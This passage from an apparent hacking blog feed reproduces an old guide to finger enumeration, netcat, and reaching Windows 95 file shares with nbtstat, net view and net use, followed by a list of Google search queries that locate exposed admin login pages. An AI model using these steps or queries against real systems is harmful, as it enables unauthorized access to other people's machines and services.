depends on whether or not the sysadmin has chosen to enable certain features of the daemon. You can also try other names, such as “root”, “daemon”, “ftp”, “bin”, etc.&lt;br /&gt;Another neat trick to try out is something that I have seen referred to as “finger forwarding”. To try this out, you need two hosts that run finger. Connect to the first host, host1.com, and enter the username that you are interested in. Then go to the second host, and enter:&lt;br /&gt;Code:&lt;br /&gt;&lt;a href="mailto:user@host1.comCode" style="color: rgb(172, 6, 4); text-decoration: none; background-color: transparent; "&gt;user@host1.comCode&lt;/a&gt;:&lt;br /&gt;You should see the same information! Again, this all depends upon&lt;br /&gt;the configuration of the finger daemon.&lt;br /&gt;Using Telnet from the Command Line&lt;br /&gt;Now, if you want to show your friends that you a “real man” because “real men don’t need no stinkin’ GUIs”, well just open up a DOS window and type:&lt;br /&gt;c:\&gt;telnet &lt;host&gt; &lt;port&gt;&lt;br /&gt;and the program will automatically attempt to connect to the host&lt;br /&gt;on the designated port for you.&lt;br /&gt;Using Netcat&lt;br /&gt;Let me start by giving a mighty big thanks to Weld Pond from L0pht for producing the netcat program for Windows NT. To get a copy of this program, which comes with source code, simply go to:&lt;br /&gt;&lt;a href="http://www.l0pht.com/~weld" onclick="javascript:pageTracker._trackPageview('/outbound/article/http://www.l0pht.com/~weld');" style="color: rgb(172, 6, 4); text-decoration: none; background-color: transparent; "&gt;http://www.l0pht.com/~weld&lt;/a&gt;&lt;br /&gt;NOTE: The first character of “l0pht: is the letter “l”. The second character is a zero, not an “o”.&lt;br /&gt;I know that the program is supposed to run on NT, but I have&lt;br /&gt;seen it run on Win95. It’s a great little program that can be used&lt;br /&gt;to do some of the same things as telnet. However, there are&lt;br /&gt;advantages to using netcat…for one, it’s a command-line program,&lt;br /&gt;and it can be included in a batch file. In fact, you can automate&lt;br /&gt;multiple calls to netcat in a batch file, saving the results to&lt;br /&gt;a text file.&lt;/p&gt;&lt;p style="margin-top: 5px; margin-right: 5px; margin-bottom: 5px; margin-left: 5px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; font-family: Tahoma, Georgia, Arial, 'century gothic', verdana, sans-serif; font-size: 13px; "&gt;Before using netcat, take a look at the readme.txt file provided in&lt;br /&gt;the zipped archive you downloaded. It goes over the instructions&lt;br /&gt;on how to download web pages using netcat, similar to what I&lt;br /&gt;described earlier using telnet.&lt;br /&gt;There are two ways to go about getting finger information using&lt;br /&gt;netcat. The first is in interactive mode. Simply type:&lt;br /&gt;c:\&gt;nc &lt;host&gt; 79&lt;br /&gt;If the daemon is running, you won’t get a command prompt back. If this is the case, type in the username and hit enter. Or use the automatic mode by first creating a text file containing the username of interest. For example, I typed:&lt;br /&gt;c:\&gt;edit root&lt;br /&gt;and entered the username “root”, without the quotes. Then from&lt;br /&gt;the command prompt, type:&lt;br /&gt;c:\&gt;nc &lt;host&gt; 79 &lt; root&lt;br /&gt;and the response will appear on your screen. You can save the&lt;br /&gt;output to a file by adding the appropriate redirection operator&lt;br /&gt;to the end of the file:&lt;br /&gt;c:\&gt;nc &lt;host&gt; 79 &lt;&gt; nc.log&lt;br /&gt;to create the file nc.log, or:&lt;br /&gt;c:\&gt;nc &lt;host&gt; 79 &lt;&gt;&gt; nc.log&lt;br /&gt;to append the response to the end of nc.log. NOTE: Make sure&lt;br /&gt;that you use spaces between the redirection operators.&lt;/p&gt;&lt;p style="margin-top: 5px; margin-right: 5px; margin-bottom: 5px; margin-left: 5px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; font-family: Tahoma, Georgia, Arial, 'century gothic', verdana, sans-serif; font-size: 13px; "&gt;How to Break into a Windows 95 machine Connected to the Internet&lt;br /&gt;Disclaimer&lt;br /&gt;The intent of this file is NOT to provide a step-by-step guide to accessing a Win95 computer while it is connected to the Internet. The intent is show you how to protect yourself.&lt;br /&gt;There are no special tools needed to access a remote Win95 machine…everything you need is right there on your Win95 system! Two methods will be described…the command-line approach and the GUI approach.&lt;br /&gt;Protecting Yourself&lt;br /&gt;First, the method of protecting yourself needs to be made perfectly clear. DON’T SHARE FILES!! I can’t stress that enough. If you are a home user, and you are connecting a Win95 computer to the Internet via some dial-up method, disable sharing. If you must share, use a strong password…8 characters minimum, a mix of upper and lower case letters and numbers, change the password every now and again. If you need to transmit the&lt;br /&gt;password to someone, do so over the phone or by written letter. To disable sharing, click on My Computer -&gt; Control Panel -&gt; Network -&gt; File and Print Sharing. In the dialog box that appears, uncheck both boxes. It’s that easy.&lt;br /&gt;What Can They Do?&lt;br /&gt;What can someone do? Well, lots of stuff, but it largely depends on what shares are available. If someone is able to share a printer from your machine, they can send you annoying letters and messages. This consumes time, your printer ink/toner, and your paper. If they are able to share a disk share, what they can do largely depends upon what’s in that share. The share appears as another directory on the attacker’s machine, so any programs they run will be consuming their own resources…memory, cpu cycles, etc. But if the attacker has read and write access to those disk shares, then you’re in trouble. If you take work home, your files may be vulnerable. Initialization and configuration files can be searched for passwords. Files can be modified and deleted. A particularly nasty thing to do is adding a line to your autoexec.bat file so that the next time your computer is booted, the hard drive is formatted without any prompting from the user. Bad ju-ju, indeed.&lt;br /&gt;** The command-line approach **&lt;br /&gt;Okay, now for the part that should probably be titled “How they do it”. All that is needed is the IP address of the remote machine. Now open up a DOS window, and at the command prompt, type:&lt;br /&gt;c:\&gt;nbtstat -A [ip_addr]&lt;br /&gt;If the remote machine is connected to the Internet and the ports used for sharing are not blocked, you should see something like:&lt;br /&gt;NetBIOS Remote Machine Name Table&lt;br /&gt;Name Type Status&lt;/p&gt;&lt;p style="margin-top: 5px; margin-right: 5px; margin-bottom: 5px; margin-left: 5px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; font-family: Tahoma, Georgia, Arial, 'century gothic', verdana, sans-serif; font-size: 13px; "&gt;———————————————&lt;/p&gt;&lt;p style="margin-top: 5px; margin-right: 5px; margin-bottom: 5px; margin-left: 5px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; font-family: Tahoma, Georgia, Arial, 'century gothic', verdana, sans-serif; font-size: 13px; "&gt;NAME &lt;00&gt; UNIQUE Registered&lt;br /&gt;DOMAIN &lt;00&gt; GROUP Registered&lt;br /&gt;NAME &lt;03&gt; UNIQUE Registered&lt;br /&gt;USERNAME &lt;03&gt; UNIQUE Registered&lt;br /&gt;MAC Address = 00-00-00-00-00-00&lt;br /&gt;This machine name table shows the machine and domain names, a logged-on username, and the address of the Ethernet adapter (the information has been obfuscated for instructional purposes).&lt;br /&gt;**Note: This machine, if unpatched and not protected with a firewall or packet-filter router, may be vulnerable to a range of denial of service attacks, which seem to be fairly popular, largely because they require no skill or knowledge to perpetrate.&lt;br /&gt;The Fix piece of information that you are looking for is in the Type column. A machine that has sharing enabled will have a hex code of “&lt;20&gt;”.&lt;br /&gt;**Note: With the right tools, it is fairly simple for a sysadmin to write a batch file that combs a subnet or her entire network, looking for client machines with sharing enabled. This batch file can then be run at specific times…every day at 2:00 am, only on Friday evenings or weekends, etc.&lt;br /&gt;If you find a machine with sharing enabled, the next thing to do is type the following command:&lt;br /&gt;c:\&gt;net view &lt;a href="file://[ip_addr/" onclick="javascript:pageTracker._trackPageview('/outbound/article/file://[ip_addr/');" style="color: rgb(172, 6, 4); text-decoration: none; background-color: transparent; "&gt;\\[ip_addr&lt;/a&gt;]&lt;br /&gt;Now, your response may be varied. You may find that there are no shares on the list, or that there are several shares available. Choose which share you would like to connect to, and type the command:&lt;br /&gt;c:\&gt;net use g: &lt;a href="file://[ip_addr]/[share_name" onclick="javascript:pageTracker._trackPageview('/outbound/article/file://[ip_addr]/[share_name');" style="color: rgb(172, 6, 4); text-decoration: none; background-color: transparent; "&gt;\\[ip_addr]\[share_name&lt;/a&gt;]&lt;br /&gt;You will likely get a response that the command was completed successfully. If that is the case, type:&lt;br /&gt;c:\&gt;cd g:&lt;br /&gt;or which ever device name you decided to use. You can now view what exists on that share using the dir commands, etc.&lt;br /&gt;Now, you may be presented with a password prompt when you ssue the above command. If that is the case, typical “hacker” (I shudder at that term) methods may be used.&lt;br /&gt;** The GUI approach **&lt;br /&gt;After issuing the nbtstat command, you can opt for the GUI approach to accessing the shares on that machine. To do so, make sure that you leave the DOS window open, or minimized…don’t close it. Now, use Notepad to open this file:&lt;br /&gt;c:\windows\lmhosts.sam&lt;br /&gt;Read over the file, and then open create another file in Notepad, called simply “Lmhosts”, without an extension. The file should contain the IP address of the host, the NetBIOS name of the host (from the nbtstat command), and #PRE, separated by tabs. Once you have added this information, save it, and minimize the window. In the DOS command window, type:&lt;br /&gt;c:\&gt;nbtstat -R&lt;br /&gt;This command reloads the cache from the Lmhosts file you just created.&lt;br /&gt;Now, click on Start -&gt; Find -&gt; Computer, and type in the NetBIOS name of the computer…the same one you added to the lmhosts file. If your attempt to connect to the machine is successful, you should be presented with a window containing the available shares. You may be presented with a password prompt window, but again, typical “hacker” (again, that term grates on me like fingernails on a chalk board, but today, it seems that it’s all folks understand) techniques may be used to break the password.&lt;/p&gt;&lt;p style="margin-top: 5px; margin-right: 5px; margin-bottom: 5px; margin-left: 5px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; font-family: Tahoma, Georgia, Arial, 'century gothic', verdana, sans-serif; font-size: 13px; "&gt;Note from Carolyn Meinel: Want to try this stuff without winding up in jail or getting expelled from school? Get a friend to give you permission to try to break in.&lt;br /&gt;First, you will need his or her IP address. Usually this will be different every time your friend logs on. You friend can learn his or her IP address by going to the DOS prompt while online and giving the command “netstat -r”. Something like this should show up:&lt;br /&gt;C:\WINDOWS&gt;netstat -r&lt;br /&gt;Route Table&lt;br /&gt;Active Routes:&lt;br /&gt;Network Address Netmask Gateway Address Interface Metric&lt;br /&gt;0.0.0.0 0.0.0.0 198.999.176.84 198.999.176.84 1&lt;br /&gt;127.0.0.0 255.0.0.0 127.0.0.1 127.0.0.1 1&lt;br /&gt;198.999.176.0 255.255.255.0 198.999.176.84 198.999.176.84 1&lt;br /&gt;198.999.176.84 255.255.255.255 127.0.0.1 127.0.0.1 1&lt;br /&gt;198.999.176.255 255.255.255.255 198.999.176.84 198.999.176.84 1&lt;br /&gt;224.0.0.0 224.0.0.0 198.999.176.84 198.999.176.84 1&lt;br /&gt;255.255.255.255 255.255.255.255 198.999.176.84 0.0.0.0 1&lt;br /&gt;Your friend’s IP address should be under “Gateway Address.” Ignore the 127.0.0.1 as this will show up for everyone and simply means “locahost” or “my own computer.” If in doubt, break the Internet connection and then get online again. The number that changes is the IP address of your friend’s computer.&lt;br /&gt;Evil Genius tip: Here is something really scary. In your shell account give the “netstat” command. If your ISP allows you to use it, you might be able to get the dynamically assigned IP addresses of people from all over the world — everyone who is browsing a Web site hosted by your ISP, everyone using ftp, spammers you might catch red-handed in the act of forging email on your ISP, guys up at 2AM playing on multiuser dungeons, IRC users, in fact you will see everyone who is connected to your ISP!&lt;/p&gt;&lt;/span&gt;</description><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total></item><item><title>Use Gooogle to Find Serial Keys</title><link>http://hackingwithme.blogspot.com/2009/04/use-gooogle-to-find-serial-keys_2721.html</link><category>Google Hacking</category><author>noreply@blogger.com (Gobind sharma)</author><pubDate>Fri, 3 Apr 2009 21:31:00 +0530</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-5739182324890807344.post-7363395405748706334</guid><description>&lt;span class="Apple-style-span" style="font-family: Tahoma; color: rgb(80, 73, 69); font-size: 13px; line-height: 20px; "&gt;&lt;p style="margin-top: 5px; margin-right: 5px; margin-bottom: 5px; margin-left: 5px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; font-family: Tahoma, Georgia, Arial, 'century gothic', verdana, sans-serif; font-size: 13px; "&gt;intitle:”remote assessment” OpenAanval Console&lt;/p&gt;&lt;p style="margin-top: 5px; margin-right: 5px; margin-bottom: 5px; margin-left: 5px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; font-family: Tahoma, Georgia, Arial, 'century gothic', verdana, sans-serif; font-size: 13px; "&gt;intitle:opengroupware.org “resistance is obsolete” “Report Bugs” “Username” “password”&lt;/p&gt;&lt;p style="margin-top: 5px; margin-right: 5px; margin-bottom: 5px; margin-left: 5px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; font-family: Tahoma, Georgia, Arial, 'century gothic', verdana, sans-serif; font-size: 13px; "&gt;“IMail Server Web Messaging” intitle:login&lt;/p&gt;&lt;p style="margin-top: 5px; margin-right: 5px; margin-bottom: 5px; margin-left: 5px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; font-family: Tahoma, Georgia, Arial, 'century gothic', verdana, sans-serif; font-size: 13px; "&gt;“Login - Sun Cobalt RaQ”&lt;/p&gt;&lt;p style="margin-top: 5px; margin-right: 5px; margin-bottom: 5px; margin-left: 5px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; font-family: Tahoma, Georgia, Arial, 'century gothic', verdana, sans-serif; font-size: 13px; "&gt;“Login to Usermin” inurl:20000&lt;/p&gt;&lt;p style="margin-top: 5px; margin-right: 5px; margin-bottom: 5px; margin-left: 5px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; font-family: Tahoma, Georgia, Arial, 'century gothic', verdana, sans-serif; font-size: 13px; "&gt;“Microsoft CRM : Unsupported Browser Version”&lt;/p&gt;&lt;p style="margin-top: 5px; margin-right: 5px; margin-bottom: 5px; margin-left: 5px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; font-family: Tahoma, Georgia, Arial, 'century gothic', verdana, sans-serif; font-size: 13px; "&gt;“OPENSRS Domain Management” inurl:manage.cgi&lt;/p&gt;&lt;p style="margin-top: 5px; margin-right: 5px; margin-bottom: 5px; margin-left: 5px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; font-family: Tahoma, Georgia, Arial, 'century gothic', verdana, sans-serif; font-size: 13px; "&gt;“please log in”&lt;/p&gt;&lt;p style="margin-top: 5px; margin-right: 5px; margin-bottom: 5px; margin-left: 5px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; font-family: Tahoma, Georgia, Arial, 'century gothic', verdana, sans-serif; font-size: 13px; "&gt;“powered by CuteNews *.* © * CutePHP&lt;/p&gt;&lt;p style="margin-top: 5px; margin-right: 5px; margin-bottom: 5px; margin-left: 5px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; font-family: Tahoma, Georgia, Arial, 'century gothic', verdana, sans-serif; font-size: 13px; "&gt;“SysCP - login”&lt;/p&gt;&lt;p style="margin-top: 5px; margin-right: 5px; margin-bottom: 5px; margin-left: 5px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; font-family: Tahoma, Georgia, Arial, 'century gothic', verdana, sans-serif; font-size: 13px; "&gt;“ttawlogin.cgi/?action=”&lt;/p&gt;&lt;p style="margin-top: 5px; margin-right: 5px; margin-bottom: 5px; margin-left: 5px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; font-family: Tahoma, Georgia, Arial, 'century gothic', verdana, sans-serif; font-size: 13px; "&gt;“VHCS Pro ver” -demo&lt;/p&gt;&lt;p style="margin-top: 5px; margin-right: 5px; margin-bottom: 5px; margin-left: 5px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; font-family: Tahoma, Georgia, Arial, 'century gothic', verdana, sans-serif; font-size: 13px; "&gt;“VNC Desktop” inurl:5800&lt;/p&gt;&lt;p style="margin-top: 5px; margin-right: 5px; margin-bottom: 5px; margin-left: 5px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; font-family: Tahoma, Georgia, Arial, 'century gothic', verdana, sans-serif; font-size: 13px; "&gt;“Web Control Panel” “Enter your password here”&lt;/p&gt;&lt;p style="margin-top: 5px; margin-right: 5px; margin-bottom: 5px; margin-left: 5px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; font-family: Tahoma, Georgia, Arial, 'century gothic', verdana, sans-serif; font-size: 13px; "&gt;“WebExplorer Server - Login” “Welcome to WebExplorer Server”&lt;/p&gt;&lt;p style="margin-top: 5px; margin-right: 5px; margin-bottom: 5px; margin-left: 5px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; font-family: Tahoma, Georgia, Arial, 'century gothic', verdana, sans-serif; font-size: 13px; "&gt;“WebSTAR Mail - Please Log In”&lt;/p&gt;&lt;p style="margin-top: 5px; margin-right: 5px; margin-bottom: 5px; margin-left: 5px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; font-family: Tahoma, Georgia, Arial, 'century gothic', verdana, sans-serif; font-size: 13px; "&gt;(inurl:”ars/cgi-bin/arweb?O=0″ | inurl:arweb.jsp) -site:remedy.com -site:mil&lt;/p&gt;&lt;p style="margin-top: 5px; margin-right: 5px; margin-bottom: 5px; margin-left: 5px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; font-family: Tahoma, Georgia, Arial, 'century gothic', verdana, sans-serif; font-size: 13px; "&gt;4images Administration Control Panel&lt;/p&gt;&lt;p style="margin-top: 5px; margin-right: 5px; margin-bottom: 5px; margin-left: 5px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; font-family: Tahoma, Georgia, Arial, 'century gothic', verdana, sans-serif; font-size: 13px; "&gt;allinurl:”exchange/logon.asp”&lt;/p&gt;&lt;p style="margin-top: 5px; margin-right: 5px; margin-bottom: 5px; margin-left: 5px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; font-family: Tahoma, Georgia, Arial, 'century gothic', verdana, sans-serif; font-size: 13px; "&gt;ASP.login_aspx “ASP.NET_SessionId”&lt;/p&gt;&lt;p style="margin-top: 5px; margin-right: 5px; margin-bottom: 5px; margin-left: 5px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; font-family: Tahoma, Georgia, Arial, 'century gothic', verdana, sans-serif; font-size: 13px; "&gt;CGI:IRC Login&lt;/p&gt;&lt;p style="margin-top: 5px; margin-right: 5px; margin-bottom: 5px; margin-left: 5px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; font-family: Tahoma, Georgia, Arial, 'century gothic', verdana, sans-serif; font-size: 13px; "&gt;ez Publish administration&lt;/p&gt;&lt;p style="margin-top: 5px; margin-right: 5px; margin-bottom: 5px; margin-left: 5px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; font-family: Tahoma, Georgia, Arial, 'century gothic', verdana, sans-serif; font-size: 13px; "&gt;filetype:php inurl:”webeditor.php”&lt;/p&gt;&lt;p style="margin-top: 5px; margin-right: 5px; margin-bottom: 5px; margin-left: 5px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; font-family: Tahoma, Georgia, Arial, 'century gothic', verdana, sans-serif; font-size: 13px; "&gt;filetype:pl “Download: SuSE Linux Openexchange Server CA”&lt;/p&gt;&lt;p style="margin-top: 5px; margin-right: 5px; margin-bottom: 5px; margin-left: 5px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; font-family: Tahoma, Georgia, Arial, 'century gothic', verdana, sans-serif; font-size: 13px; "&gt;filetype:r2w r2w&lt;/p&gt;&lt;p style="margin-top: 5px; margin-right: 5px; margin-bottom: 5px; margin-left: 5px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; font-family: Tahoma, Georgia, Arial, 'century gothic', verdana, sans-serif; font-size: 13px; "&gt;intext:”"BiTBOARD v2.0″ BiTSHiFTERS Bulletin Board”&lt;/p&gt;&lt;p style="margin-top: 5px; margin-right: 5px; margin-bottom: 5px; margin-left: 5px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; font-family: Tahoma, Georgia, Arial, 'century gothic', verdana, sans-serif; font-size: 13px; "&gt;intext:”Mail admins login here to administrate your domain.”&lt;/p&gt;&lt;p style="margin-top: 5px; margin-right: 5px; margin-bottom: 5px; margin-left: 5px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; font-family: Tahoma, Georgia, Arial, 'century gothic', verdana, sans-serif; font-size: 13px; "&gt;intext:”Storage Management Server for” intitle:”Server Administration”&lt;/p&gt;&lt;p style="margin-top: 5px; margin-right: 5px; margin-bottom: 5px; margin-left: 5px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; font-family: Tahoma, Georgia, Arial, 'century gothic', verdana, sans-serif; font-size: 13px; "&gt;intitle:”Athens Authentication Point”&lt;/p&gt;&lt;p style="margin-top: 5px; margin-right: 5px; margin-bottom: 5px; margin-left: 5px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; font-family: Tahoma, Georgia, Arial, 'century gothic', verdana, sans-serif; font-size: 13px; "&gt;intitle:”ColdFusion Administrator Login”&lt;/p&gt;&lt;p style="margin-top: 5px; margin-right: 5px; margin-bottom: 5px; margin-left: 5px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; font-family: Tahoma, Georgia, Arial, 'century gothic', verdana, sans-serif; font-size: 13px; "&gt;intitle:”Dell Remote Access Controller”&lt;/p&gt;&lt;p style="margin-top: 5px; margin-right: 5px; margin-bottom: 5px; margin-left: 5px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; font-family: Tahoma, Georgia, Arial, 'century gothic', verdana, sans-serif; font-size: 13px; "&gt;intitle:”ePowerSwitch Login”&lt;/p&gt;&lt;p style="margin-top: 5px; margin-right: 5px; margin-bottom: 5px; margin-left: 5px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; font-family: Tahoma, Georgia, Arial, 'century gothic', verdana, sans-serif; font-size: 13px; "&gt;intitle:”Icecast Administration Admin Page”&lt;/p&gt;&lt;p style="margin-top: 5px; margin-right: 5px; margin-bottom: 5px; margin-left: 5px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; font-family: Tahoma, Georgia, Arial, 'century gothic', verdana, sans-serif; font-size: 13px; "&gt;intitle:”ISPMan : Unauthorized Access prohibited”&lt;/p&gt;&lt;p style="margin-top: 5px; margin-right: 5px; margin-bottom: 5px; margin-left: 5px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; font-family: Tahoma, Georgia, Arial, 'century gothic', verdana, sans-serif; font-size: 13px; "&gt;intitle:”ITS System Information” “Please log on to the SAP System”&lt;/p&gt;&lt;p style="margin-top: 5px; margin-right: 5px; margin-bottom: 5px; margin-left: 5px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; font-family: Tahoma, Georgia, Arial, 'century gothic', verdana, sans-serif; font-size: 13px; "&gt;intitle:”Login - powered by Easy File Sharing Web Server”&lt;/p&gt;&lt;p style="margin-top: 5px; margin-right: 5px; margin-bottom: 5px; margin-left: 5px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; font-family: Tahoma, Georgia, Arial, 'century gothic', verdana, sans-serif; font-size: 13px; "&gt;intitle:”MailMan Login”&lt;/p&gt;&lt;p style="margin-top: 5px; margin-right: 5px; margin-bottom: 5px; margin-left: 5px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; font-family: Tahoma, Georgia, Arial, 'century gothic', verdana, sans-serif; font-size: 13px; "&gt;intitle:”microsoft certificate services” inurl:certsrv&lt;/p&gt;&lt;p style="margin-top: 5px; margin-right: 5px; margin-bottom: 5px; margin-left: 5px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; font-family: Tahoma, Georgia, Arial, 'century gothic', verdana, sans-serif; font-size: 13px; "&gt;intitle:”MikroTik RouterOS Managing Webpage”&lt;/p&gt;&lt;p style="margin-top: 5px; margin-right: 5px; margin-bottom: 5px; margin-left: 5px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; font-family: Tahoma, Georgia, Arial, 'century gothic', verdana, sans-serif; font-size: 13px; "&gt;intitle:”MX Control Console” “If you can’t remember”&lt;/p&gt;&lt;p style="margin-top: 5px; margin-right: 5px; margin-bottom: 5px; margin-left: 5px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; font-family: Tahoma, Georgia, Arial, 'century gothic', verdana, sans-serif; font-size: 13px; "&gt;intitle:”Novell Web Services” intext:”Select a service and a language.”&lt;/p&gt;&lt;p style="margin-top: 5px; margin-right: 5px; margin-bottom: 5px; margin-left: 5px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; font-family: Tahoma, Georgia, Arial, 'century gothic', verdana, sans-serif; font-size: 13px; "&gt;intitle:”oMail-admin Administration - Login” -inurl:omnis.ch&lt;/p&gt;&lt;p style="margin-top: 5px; margin-right: 5px; margin-bottom: 5px; margin-left: 5px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; font-family: Tahoma, Georgia, Arial, 'century gothic', verdana, sans-serif; font-size: 13px; "&gt;intitle:”Philex 0.2*” -script -site:freelists.org&lt;/p&gt;&lt;p style="margin-top: 5px; margin-right: 5px; margin-bottom: 5px; margin-left: 5px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; font-family: Tahoma, Georgia, Arial, 'century gothic', verdana, sans-serif; font-size: 13px; "&gt;intitle:”PHP Advanced Transfer” inurl:”login.php”&lt;/p&gt;&lt;p style="margin-top: 5px; margin-right: 5px; margin-bottom: 5px; margin-left: 5px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; font-family: Tahoma, Georgia, Arial, 'century gothic', verdana, sans-serif; font-size: 13px; "&gt;intitle:”php icalendar administration” -site:sourceforge.net&lt;/p&gt;&lt;p style="margin-top: 5px; margin-right: 5px; margin-bottom: 5px; margin-left: 5px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; font-family: Tahoma, Georgia, Arial, 'century gothic', verdana, sans-serif; font-size: 13px; "&gt;intitle:”php icalendar administration” -site:sourceforge.net&lt;/p&gt;&lt;p style="margin-top: 5px; margin-right: 5px; margin-bottom: 5px; margin-left: 5px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; font-family: Tahoma, Georgia, Arial, 'century gothic', verdana, sans-serif; font-size: 13px; "&gt;intitle:”please login” “your password is *”&lt;/p&gt;&lt;p style="margin-top: 5px; margin-right: 5px; margin-bottom: 5px; margin-left: 5px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; font-family: Tahoma, Georgia, Arial, 'century gothic', verdana, sans-serif; font-size: 13px; "&gt;intitle:”Remote Desktop Web Connection” inurl:tsweb&lt;/p&gt;&lt;p style="margin-top: 5px; margin-right: 5px; margin-bottom: 5px; margin-left: 5px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; font-family: Tahoma, Georgia, Arial, 'century gothic', verdana, sans-serif; font-size: 13px; "&gt;intitle:”teamspeak server-administration&lt;/p&gt;&lt;p style="margin-top: 5px; margin-right: 5px; margin-bottom: 5px; margin-left: 5px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; font-family: Tahoma, Georgia, Arial, 'century gothic', verdana, sans-serif; font-size: 13px; "&gt;intitle:”Tomcat Server Administration”&lt;/p&gt;&lt;p style="margin-top: 5px; margin-right: 5px; margin-bottom: 5px; margin-left: 5px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; font-family: Tahoma, Georgia, Arial, 'century gothic', verdana, sans-serif; font-size: 13px; "&gt;intitle:”TUTOS Login”&lt;/p&gt;&lt;p style="margin-top: 5px; margin-right: 5px; margin-bottom: 5px; margin-left: 5px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; font-family: Tahoma, Georgia, Arial, 'century gothic', verdana, sans-serif; font-size: 13px; "&gt;intitle:”vhost” intext:”vHost . 2000-2004″&lt;/p&gt;&lt;p style="margin-top: 5px; margin-right: 5px; margin-bottom: 5px; margin-left: 5px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; font-family: Tahoma, Georgia, Arial, 'century gothic', verdana, sans-serif; font-size: 13px; "&gt;intitle:”Virtual Server Administration System”&lt;/p&gt;&lt;p style="margin-top: 5px; margin-right: 5px; margin-bottom: 5px; margin-left: 5px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; font-family: Tahoma, Georgia, Arial, 'century gothic', verdana, sans-serif; font-size: 13px; "&gt;intitle:”VitalQIP IP Management System”&lt;/p&gt;&lt;p style="margin-top: 5px; margin-right: 5px; margin-bottom: 5px; margin-left: 5px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; font-family: Tahoma, Georgia, Arial, 'century gothic', verdana, sans-serif; font-size: 13px; "&gt;intitle:”VNC viewer for Java”&lt;/p&gt;&lt;p style="margin-top: 5px; margin-right: 5px; margin-bottom: 5px; margin-left: 5px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; font-family: Tahoma, Georgia, Arial, 'century gothic', verdana, sans-serif; font-size: 13px; "&gt;intitle:”WebLogic Server” intitle:”Console Login” inurl:console&lt;/p&gt;&lt;p style="margin-top: 5px; margin-right: 5px; margin-bottom: 5px; margin-left: 5px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; font-family: Tahoma, Georgia, Arial, 'century gothic', verdana, sans-serif; font-size: 13px; "&gt;intitle:”Welcome Site/User Administrator” “Please select the language” 